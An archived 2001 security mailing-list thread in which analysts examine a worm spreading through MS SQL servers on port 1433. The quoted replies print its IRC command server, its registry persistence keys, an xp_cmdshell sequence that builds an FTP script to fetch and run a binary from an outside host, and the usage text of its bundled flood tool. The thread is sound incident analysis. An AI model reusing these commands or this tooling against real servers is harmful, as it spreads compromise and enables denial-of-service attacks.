Apparently the file is no longer available on the ftp server. Hopefully this worm is short-lived. Arthur Donkers wrote: >Hi All, > >Analysed it a bit further (thanks to VMware and netmonitor) and >once it is started it connects to an irc server at bots.kujikiri.net, >port 6669. From the rest of the capture it seems it drops a message >there with the name of the machine it compromised and a password >like string. > >It furthermore (see strings output on executable, scan for registry >keys) adds itself to the Run entry in the registry so it is started >each time the machine is booted. A few of the registry keys: > > >SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TaskReg > >SOFTWARE\Microsoft\MSSQLServer\Client\SuperSocketNetLib\ProtocolOrder > >SOFTWARE\Microsoft\MSSQLServer\Client\ConnectTo\DSQUERY > >From the strings output it seems to contain a scanner (sm6 ..) that >will scan for new vulnerable machines. I'm not quite sure if and so, >how, it is controlled from the IRC channel. I've tested it on our >testing network so I'm not quite sure yet. > >I've attached the netmon capture file to this message. > >grtz, > >Arthur > >On Tue, 20 Nov 2001, Paul Nasrat wrote: > >>On Tue, Nov 20, 2001 at 09:54:18AM -0500, Douglas P. Brown wrote: >> >>>We saw a scan come in looking for systems answering on 1433, and >>>immediately saw several systems start scanning out for other systems >>>answering on 1433 - worm behavior? Has anyone else seen this? >>> >>No, but the binaries it downloads: >> >>win32mon.exe and dnsservice.exe >> >>Are on the ftp site in the dump. I don't have a windows debugger to put >>them through but they look interesting: >> >>exec xp_cmdshell 'start dnsservice.exe' >>exec xp_cmdshell 'del ftp.x' >>exec xp_cmdshell 'ftp -s:ftp.x >>exec xp_cmdshell 'echo quit >> ftp.x' >>exec xp_cmdshell 'echo close >> ftp.x' >>exec xp_cmdshell 'echo get dnsservice.exe>> ftp.x' >>exec xp_cmdshell 'echo cd tmp>> ftp.x' >>exec xp_cmdshell 'echo cd pub>> ftp.x' >>exec xp_cmdshell 'echo bin>> ftp.x' >>exec xp_cmdshell 'echo foo.com>> ftp.x' >>exec xp_cmdshell 'echo ftp> ftp.x' >> >>GET /%s HTTP/1.0 >>Connection: Keep-Alive >>User-Agent: Mozilla/4.75 [en] (X11; U; Linux 2.2.16-3 i686) >>[GET] - Unable to connect to http. >>[GET] - Unable to resolve host. >>http:// >>[GET] - Unable to create new socket. >>GET <bot|wildcard> <host> <save as> >>%s %s %s %s >>NOTICE %s :Voyager Alpha Force: Age of Kaiten (now with blitz-fu) >>NICK %s >>NOTICE %s :Nick cannot be larger than 9 characters. >>NOTICE %s :NICK <nick> >>sm6 has finished... >>with tcp/syn boost! >>sm6 icmp/udp has begun... >>sm6 icmp/udp (w/pkt-push!) has begun.. >>Syntax: sm6 <wildcard|botname> <dest> <-n timelength> [-d delay] [-s src >>port] [-p dst port] [-rR random src/all ports] [-z random src ips] [-t >>include tcp/syn] [-z randomize src ips] [-S pkt size] -b <bcast file> >> >>etc. >> >>Paul Nasrat >> >>---------------------------------------------------------------------------- >>This list is provided by the SecurityFocus ARIS analyzer service. >>For more information on this free incident handling, management >>and tracking system please see: http://aris.securityfocus.com >> > > >------------------------------------------------------------------------ > >---------------------------------------------------------------------------- >This list is provided by the SecurityFocus ARIS analyzer service. >For more information on this free incident handling, management >and tracking system please see: http://aris.securityfocus.com > ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Tue Nov 20 2001 - 11:02:21 PST